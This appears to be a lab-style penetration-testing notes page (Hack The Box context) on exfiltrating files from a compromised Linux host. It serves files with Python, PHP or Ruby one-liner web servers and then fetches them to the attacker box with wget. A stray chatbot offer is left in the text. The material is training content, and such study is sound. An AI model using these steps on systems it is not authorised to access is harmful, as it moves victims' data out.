🛠️ Quick Web File Transfer Method

Sometimes, you just need a quick and dirty way to transfer files from a compromised machine 🐚 to your attacker box (Pwnbox) — and lucky for us, Linux makes it easy thanks to built-in tools like Python, PHP, or Ruby! 🎯

🐍📡 1. Python file http.server

If Python is installed (which it usually is), spin up a web server with a one-liner!

Python 3:

z3tssu@htb[/htb]$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Python 2.7 (Legacy Style):

z3tssu@htb[/htb]$ python2.7 -m SimpleHTTPServer

🧙‍♂️ PHP file hosting Server ✨

If PHP is installed:

z3tssu@htb[/htb]$ php -S 0.0.0.0:8000

PHP Development Server started at http://0.0.0.0:8000

💎 Ruby file hosting Server 💻

If Ruby is available, this works too:

z3tssu@htb[/htb]$ ruby -run -ehttpd . -p8000

🪄 Output:

WEBrick HTTPServer running on port 8000

📥 2. Download the File on Pwnbox

Once the target machine (compromised linux) is serving the file, hop onto your Pwnbox (attacker machine) and download it:

z3tssu@htb[/htb]$ wget 192.168.49.128:8000/filetotransfer.txt

💾 You’ll see:

Saving to: 'filetotransfer.txt'
filetotransfer.txt saved [0/0]

📌 Pro Tip ⚠️

These are download-only methods! You’re pulling files from the target to your machine, not uploading. Also, don’t forget: 🔒 Some environments may block inbound traffic (like firewall rules), so check connectivity!

Want me to bundle these notes with the previous ones or turn them into printable flashcards? 🎴

Previous🌐 Web Upload with HTTPS 🚀Next🔄 SCP Upload

Last updated 10 months ago

hashtag🐍📡 1. Python file http.server

hashtagPython 3:

hashtagPython 2.7 (Legacy Style):

hashtag🧙‍♂️ PHP file hosting Server ✨

hashtag💎 Ruby file hosting Server 💻

hashtag📥 2. Download the File on Pwnbox

hashtag📌 Pro Tip ⚠️